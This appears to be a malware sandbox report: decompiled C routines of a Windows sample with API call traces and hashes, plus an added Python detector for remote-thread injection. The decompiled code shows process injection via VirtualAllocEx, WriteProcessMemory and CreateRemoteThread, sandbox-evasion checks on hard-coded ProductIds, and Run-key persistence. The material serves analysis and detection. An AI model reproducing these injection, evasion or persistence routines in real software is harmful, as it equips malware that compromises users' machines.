                                    				_Unknown_base(*)()* _v28;
                                    				_Unknown_base(*)()* _v32;
                                    				char _v36;
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				void* __ebp;
                                    				intOrPtr _t15;
                                    				long _t17;
                                    				void* _t19;
                                    				void* _t23;
                                    				void* _t24;
                                    				void* _t31;
                                    				long _t32;
                                    				void* _t33;
                                    				DWORD* _t34;
                                    
                                    				_t25 = __ecx;
                                    				_t34 =  &_v24;
                                    				_t33 = __ecx;
                                    				_t31 = __edx;
                                    				_t23 = __eax;
                                    				_t32 = 0;
                                    				_v28 = GetProcAddress(GetModuleHandleA("kernel32"), "GetModuleHandleA");
                                    				_v32 = GetProcAddress(GetModuleHandleA("kernel32"), "GetProcAddress");
                                    				_v36 = GetProcAddress(GetModuleHandleA("kernel32"), "ExitThread");
                                    				_t15 = E004037EC(_t23, _t23, _t25, _t33, _t31, 0); // executed
                                    				_v20 = _t15;
                                    				_t17 = E004037EC(_t23, _t23, _t25, _t31, _t31, 0); // executed
                                    				_v24 = _t17;
                                    				_t19 = E004038AC(_t23,  &_v36, E00403A28, 0, 0x14); // executed
                                    				_t24 = _t19;
                                    				if(_t24 != 0) {
                                    					WaitForSingleObject(_t24, 0xffffffff);
                                    					GetExitCodeThread(_t24, _t34);
                                    					_t32 =  *_t34;
                                    				}
                                    				return _t32;
                                    			}
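E00403A58 above is the sample's remote resolver: it resolves GetModuleHandleA, GetProcAddress and ExitThread locally, copies two strings (a module name and an export name) into the target process through E004037EC (VirtualAllocEx with PAGE_EXECUTE_READWRITE, then WriteProcessMemory), and hands the 0x14-byte block starting at _v36, which holds exactly those three pointers and the two string addresses, to E004038AC, which runs E00403A28 in the target via CreateRemoteThread and waits for it. The thread's exit code, read with GetExitCodeThread, is the function's return value, so the target process does the lookup and reports the address back. From a detection standpoint the sequence VirtualAllocEx, WriteProcessMemory, CreateRemoteThread from one process against a foreign PID is the signal. The Python below is an added example of that correlation over an API trace; it is not code from the sample, from Joe Sandbox or from any project. The event shape (dicts with ts, pid, api, target_pid, protect), the PIDs and the trace itself are constructed; a real tracer yields process handles, and resolving handle to PID is assumed to have happened before the events are fed in.

```python
"""Correlate alloc/write/remote-thread API calls into injection findings
(added illustration; not code from the sample or from the sandbox)."""

from collections import defaultdict

PAGE_EXECUTE_READWRITE = 0x40     # protect value E004037EC passes to VirtualAllocEx
STAGES = ("VirtualAllocEx", "WriteProcessMemory", "CreateRemoteThread")


def find_remote_thread_injection(events):
    """Return one finding per (source, target) pair that completes all three
    stages in order.  Calls a process makes against itself are ignored, and
    a fresh VirtualAllocEx restarts the sequence for that pair."""
    next_stage = defaultdict(int)     # (src, dst) -> index of the stage expected next
    first = {}                        # (src, dst) -> details of the allocation
    hits = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        src, dst, api = ev["pid"], ev.get("target_pid"), ev["api"]
        if dst is None or dst == src:
            continue
        key = (src, dst)
        stage = next_stage[key]
        if api == STAGES[0]:
            next_stage[key] = 1
            first[key] = {"ts": ev["ts"],
                          "rwx": ev.get("protect") == PAGE_EXECUTE_READWRITE}
        elif stage and api == STAGES[stage]:
            next_stage[key] = stage + 1
            if next_stage[key] == len(STAGES):
                hits.append({"src": src, "dst": dst,
                             "first_ts": first[key]["ts"], "last_ts": ev["ts"],
                             "rwx": first[key]["rwx"]})
                next_stage[key] = 0
    return hits


# Constructed trace.  PID 1000 plays the dropper, PID 2000 stands in for
# explorer.exe, and PID 3000 is a debugger-like tool that only writes into
# PID 4000 and never starts a thread there.
SAMPLE_EVENTS = [
    {"ts": 1, "pid": 1000, "api": "VirtualAlloc", "target_pid": 1000},
    {"ts": 2, "pid": 1000, "api": "VirtualAllocEx", "target_pid": 2000, "protect": 0x40},
    {"ts": 3, "pid": 3000, "api": "WriteProcessMemory", "target_pid": 4000},
    {"ts": 4, "pid": 1000, "api": "WriteProcessMemory", "target_pid": 2000},
    {"ts": 5, "pid": 1000, "api": "CreateRemoteThread", "target_pid": 2000},
    {"ts": 6, "pid": 1000, "api": "WaitForSingleObject", "target_pid": None},
    {"ts": 7, "pid": 1000, "api": "ReadProcessMemory", "target_pid": 2000},
]

if __name__ == "__main__":
    for h in find_remote_thread_injection(SAMPLE_EVENTS):
        print(f"pid {h['src']} -> pid {h['dst']}: alloc/write/thread between "
              f"ts {h['first_ts']} and {h['last_ts']} (RWX={h['rwx']})")
```

The RWX flag is recorded rather than required: the sample asks for PAGE_EXECUTE_READWRITE, but a detector that insists on it misses variants that allocate RW and flip to RX later, while the three-stage ordering alone already separates this pattern from a debugger that only writes memory.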

                                    APIs
                                    • GetModuleHandleA.KERNEL32(kernel32,GetModuleHandleA), ref: 00403A71
                                    • GetProcAddress.KERNEL32(00000000,kernel32), ref: 00403A77
                                    • GetModuleHandleA.KERNEL32(kernel32,GetProcAddress,00000000,kernel32,GetModuleHandleA), ref: 00403A8A
                                    • GetProcAddress.KERNEL32(00000000,kernel32), ref: 00403A90
                                    • GetModuleHandleA.KERNEL32(kernel32,ExitThread,00000000,kernel32,GetProcAddress,00000000,kernel32,GetModuleHandleA), ref: 00403AA3
                                    • GetProcAddress.KERNEL32(00000000,kernel32), ref: 00403AA9
                                      • Part of subcall function 004037EC: VirtualAllocEx.KERNEL32(?,00000000,00000001,00003000,00000040,00000000,0040386A,?,?,?,?,00000000,00000000,00000000), ref: 00403828
                                      • Part of subcall function 004037EC: WriteProcessMemory.KERNEL32(?,00000000,?,00000001,?,?,00000000,00000001,00003000,00000040,00000000,0040386A), ref: 0040384A
                                      • Part of subcall function 004038AC: CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004038EA
                                      • Part of subcall function 004038AC: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004038FA
                                      • Part of subcall function 004038AC: ReadProcessMemory.KERNEL32(?,00000000,?,?,00000000,00000000,000000FF), ref: 0040390D
                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,kernel32,ExitThread,00000000,kernel32,GetProcAddress,00000000,kernel32,GetModuleHandleA), ref: 00403AE9
                                    • GetExitCodeThread.KERNEL32(00000000,?,00000000,000000FF,00000000,kernel32,ExitThread,00000000,kernel32,GetProcAddress,00000000,kernel32,GetModuleHandleA), ref: 00403AF0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: AddressHandleModuleProc$MemoryObjectProcessSingleThreadWait$AllocCodeCreateExitReadRemoteVirtualWrite
                                    • String ID: ExitThread$GetModuleHandleA$GetProcAddress$kernel32
                                    • API String ID: 3826234517-3123223305
                                    • Opcode ID: a38141fedca94ac122ee037387a2f52a5821eed1d9036632861cd3ea9cb5d70f
                                    • Instruction ID: 752bd04c13f1fb2c2637546d5d52efbb0f8f36bbb6a531361d47cc1ab833d988
                                    • Opcode Fuzzy Hash: a38141fedca94ac122ee037387a2f52a5821eed1d9036632861cd3ea9cb5d70f
                                    • Instruction Fuzzy Hash: 350157A0B443053AC610BE7A4C42A1BBE9C9BC472BB10893F7554B72D2DA7DDF0486AD
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E004012B8(CHAR* __eax, intOrPtr* __edx) {
                                    				char _t5;
                                    				char _t6;
                                    				CHAR* _t7;
                                    				CHAR* _t8;
                                    				char _t9;
                                    				CHAR* _t11;
                                    				char _t14;
                                    				CHAR* _t15;
                                    				char _t17;
                                    				CHAR* _t19;
                                    				CHAR* _t22;
                                    				CHAR* _t23;
                                    				CHAR* _t32;
                                    				intOrPtr _t33;
                                    				intOrPtr* _t34;
                                    				void* _t35;
                                    				void* _t36;
                                    
                                    				_t34 = __edx;
                                    				_t22 = __eax;
                                    				while(1) {
                                    					L2:
                                    					_t5 =  *_t22;
                                    					if(_t5 != 0 && _t5 <= 0x20) {
                                    						_t22 = CharNextA(_t22);
                                    					}
                                    					L2:
                                    					_t5 =  *_t22;
                                    					if(_t5 != 0 && _t5 <= 0x20) {
                                    						_t22 = CharNextA(_t22);
                                    					}
                                    					L4:
                                    					if( *_t22 != 0x22 || _t22[1] != 0x22) {
                                    						_t36 = 0;
                                    						_t32 = _t22;
                                    						while(1) {
                                    							_t6 =  *_t22;
                                    							if(_t6 <= 0x20) {
                                    								break;
                                    							}
                                    							if(_t6 != 0x22) {
                                    								_t7 = CharNextA(_t22);
                                    								_t36 = _t36 + _t7 - _t22;
                                    								_t22 = _t7;
                                    								continue;
                                    							}
                                    							_t8 = CharNextA(_t22); // executed
                                    							_t22 = _t8;
                                    							while(1) {
                                    								_t9 =  *_t22;
                                    								if(_t9 == 0 || _t9 == 0x22) {
                                    									break;
                                    								}
                                    								_t11 = CharNextA(_t22);
                                    								_t36 = _t36 + _t11 - _t22;
                                    								_t22 = _t11;
                                    							}
                                    							if( *_t22 != 0) {
                                    								_t22 = CharNextA(_t22);
                                    							}
                                    						}
                                    						E00402074(_t34, _t36);
                                    						_t23 = _t32;
                                    						_t33 =  *_t34;
                                    						_t35 = 0;
                                    						while(1) {
                                    							_t14 =  *_t23;
                                    							if(_t14 <= 0x20) {
                                    								break;
                                    							}
                                    							if(_t14 != 0x22) {
                                    								_t15 = CharNextA(_t23);
                                    								if(_t15 <= _t23) {
                                    									continue;
                                    								} else {
                                    									goto L27;
                                    								}
                                    								do {
                                    									L27:
                                    									 *((char*)(_t33 + _t35)) =  *_t23;
                                    									_t23 =  &(_t23[1]);
                                    									_t35 = _t35 + 1;
                                    								} while (_t15 > _t23);
                                    								continue;
                                    							}
                                    							_t23 = CharNextA(_t23);
                                    							while(1) {
                                    								_t17 =  *_t23;
                                    								if(_t17 == 0 || _t17 == 0x22) {
                                    									break;
                                    								}
                                    								_t19 = CharNextA(_t23);
                                    								if(_t19 <= _t23) {
                                    									continue;
                                    								} else {
                                    									goto L21;
                                    								}
                                    								do {
                                    									L21:
                                    									 *((char*)(_t33 + _t35)) =  *_t23;
                                    									_t23 =  &(_t23[1]);
                                    									_t35 = _t35 + 1;
                                    								} while (_t19 > _t23);
                                    							}
                                    							if( *_t23 != 0) {
                                    								_t23 = CharNextA(_t23);
                                    							}
                                    						}
                                    						return _t23;
                                    					} else {
                                    						_t22 =  &(_t22[2]);
                                    						continue;
                                    					}
                                    				}
                                    			}

                                    APIs
                                    • CharNextA.USER32(00000000,?,00000000,00000001,?,004013EA,?,?,?,00406A79,00000000,00406ABE), ref: 004012EF
                                    • CharNextA.USER32(00000000,00000000,?,00000000,00000001,?,004013EA,?,?,?,00406A79,00000000,00406ABE), ref: 004012F9
                                    • CharNextA.USER32(00000000,00000000,?,00000000,00000001,?,004013EA,?,?,?,00406A79,00000000,00406ABE), ref: 00401316
                                    • CharNextA.USER32(00000000,?,00000000,00000001,?,004013EA,?,?,?,00406A79,00000000,00406ABE), ref: 00401320
                                    • CharNextA.USER32(00000000,00000000,?,00000000,00000001,?,004013EA,?,?,?,00406A79,00000000,00406ABE), ref: 00401349
                                    • CharNextA.USER32(00000000,00000000,00000000,?,00000000,00000001,?,004013EA,?,?,?,00406A79,00000000,00406ABE), ref: 00401353
                                    • CharNextA.USER32(00000000,00000000,00000000,?,00000000,00000001,?,004013EA,?,?,?,00406A79,00000000,00406ABE), ref: 00401377
                                    • CharNextA.USER32(00000000,00000000,?,00000000,00000001,?,004013EA,?,?,?,00406A79,00000000,00406ABE), ref: 00401381
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp
• Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp
• Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp
• Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp
• Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CharNext
                                    • String ID: "$"
                                    • API String ID: 3213498283-3758156766
                                    • Opcode ID: 69bc44e6375b114957132a77422f8722e1c84a2160c11b934303181ded4122b0
                                    • Instruction ID: 10f63cc1fa669f131e3f68441fcaf6b27babd9536db3b85d99238111a4137022
                                    • Opcode Fuzzy Hash: 69bc44e6375b114957132a77422f8722e1c84a2160c11b934303181ded4122b0
                                    • Instruction Fuzzy Hash: AE21C8446043C059EF316ABA08C07A667C54A1B308B5844BBDAC1FBBF7D47D4887C22E
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 58%
                                    			E00403954(void* __eax, void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi, void* __eflags) {
                                    				char _v8;
                                    				_Unknown_base(*)()* _v12;
                                    				intOrPtr _v16;
                                    				char _v20;
                                    				intOrPtr _t20;
                                    				void* _t22;
                                    				void* _t30;
                                    				intOrPtr _t37;
                                    				void* _t40;
                                    				void* _t43;
                                    
                                    				_t30 = __ecx;
                                    				_push(__ebx);
                                    				_push(__esi);
                                    				_v8 = __edx;
                                    				_t40 = __eax;
                                    				E00401F38(_v8);
                                    				_push(_t43);
                                    				_push(0x4039f2);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t43 + 0xfffffff0;
                                    				_v12 = GetProcAddress(GetModuleHandleA("kernel32"), "Sleep");
                                    				_v20 = GetProcAddress(GetModuleHandleA("kernel32"), "LoadLibraryA");
                                    				_t20 = E004037EC(_t40, 0, _t30, E00401F48(_v8), __edi, _t40); // executed
                                    				_v16 = _t20;
                                    				_t22 = E004038AC(_t40,  &_v20, E00403920, 0, 0xc); // executed
                                    				if(_t22 != 0) {
                                    					CloseHandle(_t22);
                                    				}
                                    				_pop(_t37);
                                    				 *[fs:eax] = _t37;
                                    				_push(E004039F9);
                                    				return E00401AC0( &_v8);
                                    			}

                                    APIs
                                    • GetModuleHandleA.KERNEL32(kernel32,Sleep,00000000,004039F2), ref: 00403983
                                    • GetProcAddress.KERNEL32(00000000,kernel32), ref: 00403989
                                    • GetModuleHandleA.KERNEL32(kernel32,LoadLibraryA,Sleep,00000000,004039F2), ref: 0040399B
                                    • GetProcAddress.KERNEL32(00000000,kernel32), ref: 004039A1
                                      • Part of subcall function 004037EC: VirtualAllocEx.KERNEL32(?,00000000,00000001,00003000,00000040,00000000,0040386A,?,?,?,?,00000000,00000000,00000000), ref: 00403828
                                      • Part of subcall function 004037EC: WriteProcessMemory.KERNEL32(?,00000000,?,00000001,?,?,00000000,00000001,00003000,00000040,00000000,0040386A), ref: 0040384A
                                      • Part of subcall function 004038AC: CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004038EA
                                      • Part of subcall function 004038AC: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004038FA
                                      • Part of subcall function 004038AC: ReadProcessMemory.KERNEL32(?,00000000,?,?,00000000,00000000,000000FF), ref: 0040390D
                                    • CloseHandle.KERNEL32(00000000,00000000,kernel32,LoadLibraryA,Sleep,00000000,004039F2), ref: 004039D5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp
• Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp
• Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp
• Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp
• Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Handle$AddressMemoryModuleProcProcess$AllocCloseCreateObjectReadRemoteSingleThreadVirtualWaitWrite
                                    • String ID: LoadLibraryA$Sleep$kernel32
                                    • API String ID: 3487503967-1813742806
                                    • Opcode ID: f87daed2c883fae0bc52b1811faf6daf2e3c45671e56467328cf1f20e444393c
                                    • Instruction ID: 3dd456deda738439a9530638aaf5270c0b396e353cabac5e26cfdff56c824f73
                                    • Opcode Fuzzy Hash: f87daed2c883fae0bc52b1811faf6daf2e3c45671e56467328cf1f20e444393c
                                    • Instruction Fuzzy Hash: 01012DB0B40605BED701EFA68C03A5E7EAC9B44716B60497BB400F72D1DB7C9F009A58
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E004053EC() {
                                    				char _v264;
                                    				int _v268;
                                    				void* _v272;
                                    				long _t6;
                                    				int _t15;
                                    
                                    				_t15 = 0;
                                    				_t6 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", 0, 1,  &_v268); // executed
                                    				if(_t6 == 0) {
                                    					_v268 = 0x101;
                                    					RegQueryValueExA(_v272, "ProductId", 0, 0,  &_v264,  &_v268); // executed
                                    					if( &_v264 == "76487-644-3177037-23510") {
                                    						_t15 = 1;
                                    					}
                                    				}
                                    				RegCloseKey(_v272);
                                    				return _t15;
                                    			}

                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001,?,00000000,0040B1C4,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4), ref: 00405404
                                    • RegQueryValueExA.ADVAPI32(?,ProductId,00000000,00000000,?,?,80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001,?,00000000,0040B1C4,00000000,0040BF40,00000000), ref: 0040542D
                                    • RegCloseKey.ADVAPI32(00000000,80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001,?,00000000,0040B1C4,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4), ref: 00405443
                                    Strings
                                    • Software\Microsoft\Windows\CurrentVersion, xrefs: 004053FA
                                    • ProductId, xrefs: 00405423
                                    • 76487-644-3177037-23510, xrefs: 00405436
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp
• Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp
• Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp
• Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp
• Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CloseOpenQueryValue
                                    • String ID: 76487-644-3177037-23510$ProductId$Software\Microsoft\Windows\CurrentVersion
                                    • API String ID: 3677997916-300012159
                                    • Opcode ID: 54b8dddc72f5521d94e0edf2fcf669d6ba73802ff5b9393f4314c7fe48c2e6b5
                                    • Instruction ID: 4dbc9aba648d7bbbf83a3552de5bfbcba9719c904d90c9cb7132e047c1fadaca
                                    • Opcode Fuzzy Hash: 54b8dddc72f5521d94e0edf2fcf669d6ba73802ff5b9393f4314c7fe48c2e6b5
                                    • Instruction Fuzzy Hash: 30F08C706403007AE610EA90CC82FDB778CDB40715F50483AFA84FA1D1D6BDE9889A6A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E004054A4() {
                                    				char _v264;
                                    				int _v268;
                                    				void* _v272;
                                    				long _t6;
                                    				int _t15;
                                    
                                    				_t15 = 0;
                                    				_t6 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", 0, 1,  &_v268); // executed
                                    				if(_t6 == 0) {
                                    					_v268 = 0x101;
                                    					RegQueryValueExA(_v272, "ProductId", 0, 0,  &_v264,  &_v268); // executed
                                    					if( &_v264 == "76487-337-8429955-22614") {
                                    						_t15 = 1;
                                    					}
                                    				}
                                    				RegCloseKey(_v272); // executed
                                    				return _t15;
                                    			}

                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001,?,00000000,0040B1AA,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4), ref: 004054BC
                                    • RegQueryValueExA.ADVAPI32(?,ProductId,00000000,00000000,?,?,80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001,?,00000000,0040B1AA,00000000,0040BF40,00000000), ref: 004054E5
                                    • RegCloseKey.ADVAPI32(00000000,80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001,?,00000000,0040B1AA,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4), ref: 004054FB
                                    Strings
                                    • Software\Microsoft\Windows\CurrentVersion, xrefs: 004054B2
                                    • ProductId, xrefs: 004054DB
                                    • 76487-337-8429955-22614, xrefs: 004054EE
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp
• Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp
• Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp
• Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp
• Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CloseOpenQueryValue
                                    • String ID: 76487-337-8429955-22614$ProductId$Software\Microsoft\Windows\CurrentVersion
                                    • API String ID: 3677997916-3593519172
                                    • Opcode ID: 2750bd466e02aa405076e09ed9390e2a88f793c938554653eb2e146c9d186da2
                                    • Instruction ID: 47032f9d578e649e4c59a246db62157aaca0609ee869790ecbc754fa5fe81585
                                    • Opcode Fuzzy Hash: 2750bd466e02aa405076e09ed9390e2a88f793c938554653eb2e146c9d186da2
                                    • Instruction Fuzzy Hash: A6F0A7703403007AD610DA94CC82F9B778CDB41714F50443AF944FA1C0D3BDE9489F2A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 81%
                                    			E00406B54(intOrPtr __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
                                    				intOrPtr _v8;
                                    				char _v12;
                                    				char _v16;
                                    				char _v20;
                                    				char _v24;
                                    				char _v28;
                                    				char _v32;
                                    				char _v36;
                                    				char _v40;
                                    				char _v44;
                                    				char _v48;
                                    				char _v52;
                                    				char _v56;
                                    				char _v60;
                                    				char _v64;
                                    				char _v68;
                                    				char _v72;
                                    				char _v76;
                                    				char _v80;
                                    				char _v84;
                                    				char _v88;
                                    				char _v92;
                                    				char _v96;
                                    				char _v100;
                                    				char _v104;
                                    				char _v108;
                                    				char _v112;
                                    				char _v116;
                                    				char _v120;
                                    				char _v124;
                                    				char _v128;
                                    				intOrPtr* _t106;
                                    				intOrPtr* _t107;
                                    				intOrPtr* _t108;
                                    				intOrPtr* _t109;
                                    				intOrPtr* _t110;
                                    				void* _t112;
                                    				void* _t126;
                                    				intOrPtr* _t143;
                                    				void* _t154;
                                    				void* _t166;
                                    				CHAR* _t169;
                                    				int _t172;
                                    				int _t186;
                                    				intOrPtr* _t190;
                                    				intOrPtr* _t191;
                                    				intOrPtr* _t192;
                                    				intOrPtr* _t193;
                                    				intOrPtr* _t198;
                                    				void* _t200;
                                    				void* _t201;
                                    				intOrPtr* _t204;
                                    				intOrPtr* _t218;
                                    				intOrPtr* _t226;
                                    				intOrPtr* _t240;
                                    				intOrPtr* _t248;
                                    				intOrPtr* _t258;
                                    				intOrPtr* _t272;
                                    				intOrPtr* _t284;
                                    				intOrPtr _t301;
                                    				intOrPtr* _t313;
                                    				void* _t314;
                                    				intOrPtr* _t315;
                                    				intOrPtr* _t317;
                                    				void* _t321;
                                    				intOrPtr* _t332;
                                    				intOrPtr _t333;
                                    				intOrPtr* _t334;
                                    				intOrPtr* _t338;
                                    				char _t340;
                                    				intOrPtr _t351;
                                    				CHAR* _t392;
                                    				CHAR* _t394;
                                    				intOrPtr _t396;
                                    				intOrPtr _t397;
                                    				void* _t402;
                                    
                                    				_t393 = __esi;
                                    				_t391 = __edi;
                                    				_t396 = _t397;
                                    				_t314 = 0xf;
                                    				do {
                                    					_push(0);
                                    					_push(0);
                                    					_t314 = _t314 - 1;
                                    				} while (_t314 != 0);
                                    				_push(_t314);
                                    				_push(__esi);
                                    				_push(__edi);
                                    				_t313 = __edx;
                                    				_v8 = __eax;
                                    				E00401F38(_v8);
                                    				_push(_t396);
                                    				_push(0x407061);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t397;
                                    				E00401B14(_t313, _v8);
                                    				_t106 =  *0x40d1f0; // 0x40e890
                                    				_t399 =  *_t106;
                                    				if( *_t106 != 0) {
                                    					_t107 =  *0x40d1f0; // 0x40e890
                                    					__eflags =  *_t107 - 1;
                                    					if(__eflags != 0) {
                                    						_t108 =  *0x40d1f0; // 0x40e890
                                    						__eflags =  *_t108 - 2;
                                    						if(__eflags != 0) {
                                    							_t109 =  *0x40d1f0; // 0x40e890
                                    							__eflags =  *_t109 - 3;
                                    							if(__eflags != 0) {
                                    								_t110 =  *0x40d218; // 0x40e894
                                    								_t112 = E00401D50( *_t110);
                                    								_t332 =  *0x40d218; // 0x40e894
                                    								_t333 =  *_t332;
                                    								__eflags =  *((char*)(_t333 + _t112 - 1)) - 0x5c;
                                    								if( *((char*)(_t333 + _t112 - 1)) != 0x5c) {
                                    									_t301 =  *0x40d218; // 0x40e894
                                    									E00401D58(_t301, 0x407078);
                                    								}
                                    								_t334 =  *0x40d218; // 0x40e894
                                    								E00401B58( &_v12,  *_t334);
                                    								E00401CAC( &_v28, E00401F48(_v12));
                                    								E00406684(_v28, _t313, __eflags);
                                    							} else {
                                    								E004061DC( &_v12, _t313, __esi, __eflags);
                                    							}
                                    						} else {
                                    							E00406034( &_v12, _t313, __eflags);
                                    						}
                                    					} else {
                                    						E00405F7C( &_v12, _t313, __eflags);
                                    					}
                                    				} else {
                                    					E00405EF0( &_v12, _t313, _t399);
                                    				}
                                    				if( *((char*)(_v12 + E00401D50(_v12) - 1)) != 0x5c) {
                                    					E00401D58( &_v12, 0x407078);
                                    				}
                                    				_t338 =  *0x40d208; // 0x40e898
                                    				E00401D58( &_v12,  *_t338);
                                    				_t126 = E00401D50(_v12);
                                    				_t340 = _v12;
                                    				_t401 =  *((char*)(_t340 + _t126 - 1)) - 0x5c;
                                    				if( *((char*)(_t340 + _t126 - 1)) != 0x5c) {
                                    					E00401D58( &_v12, 0x407078);
                                    				}
                                    				_t315 =  *0x40d20c; // 0x40e89c
                                    				E00401D9C( &_v16,  *_t315, _v12);
                                    				E00401CAC( &_v32, E00401F48(_v12));
                                    				E00406684(_v32, _t313, _t401); // executed
                                    				E00401CAC( &_v36, E00401F48(_v16));
                                    				E00405A28(_v36, _t313, _t391, _t393, _t401); // executed
                                    				E00405BEC( &_v40, _t313, _t393, _t401); // executed
                                    				_push(_v40);
                                    				_push(0x407078);
                                    				_t143 =  *0x40d208; // 0x40e898
                                    				_push( *_t143);
                                    				E00401E10();
                                    				_t402 =  *((char*)(_v20 + E00401D50(_v20) - 1)) - 0x5c;
                                    				if(_t402 != 0) {
                                    					E00401D58( &_v20, 0x407078);
                                    				}
                                    				_t317 =  *0x40d20c; // 0x40e89c
                                    				E00401D9C( &_v24,  *_t317, _v20);
                                    				E00404740(_v16, _t313,  &_v44, _t391, _t393, _t402);
                                    				_push(_v44);
                                    				E00404740(_v8, _t313,  &_v48, _t391, _t393, _t402);
                                    				_pop(_t154);
                                    				E00401E94(_t154, _v48);
                                    				if(_t402 == 0) {
                                    					L21:
                                    					E00401B14(_t313, _v8);
                                    					goto L40;
                                    				} else {
                                    					E00404740(_v24, _t313,  &_v52, _t391, _t393, _t402);
                                    					_push(_v52);
                                    					E00404740(_v8, _t313,  &_v56, _t391, _t393, _t402);
                                    					_pop(_t166);
                                    					E00401E94(_t166, _v56);
                                    					if(_t402 != 0) {
                                    						_t169 = E00401F48(_v16);
                                    						_t394 = E00401F48(_v8);
                                    						_t172 = CopyFileA(_t394, _t169, 0);
                                    						__eflags = _t172 - 1;
                                    						asm("sbb eax, eax");
                                    						__eflags = _t172 + 1 - 1;
                                    						if(_t172 + 1 != 1) {
                                    							E00401CAC( &_v60, E00401F48(_v20));
                                    							E00406684(_v60, _t313, __eflags);
                                    							_t392 = E00401F48(_v24);
                                    							E00401CAC( &_v64, _t392);
                                    							E00405A28(_v64, _t313, _t392, _t394, __eflags);
                                    							_t186 = CopyFileA(_t394, _t392, 0);
                                    							__eflags = _t186 - 1;
                                    							asm("sbb eax, eax");
                                    							__eflags = _t186 + 1 - 1;
                                    							if(_t186 + 1 != 1) {
                                    								E00401B14(_t313, _v8);
                                    							} else {
                                    								E00401B14(_t313, _v24);
                                    							}
                                    						} else {
                                    							E00401B14(_t313, _v16);
                                    						}
                                    						_t190 =  *0x40d1ec; // 0x40e8ac
                                    						__eflags =  *_t190;
                                    						if( *_t190 != 0) {
                                    							_t248 =  *0x40d1ec; // 0x40e8ac
                                    							E00401CAC( &_v72, E00401F48( *_t248));
                                    							E00406088(0x80000002, _t313, _v72, "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run", _t394, __eflags,  &_v68, 0);
                                    							E00401E94(_v68,  *_t313);
                                    							if(__eflags != 0) {
                                    								E00401CAC( &_v76, E00401F48( *_t313));
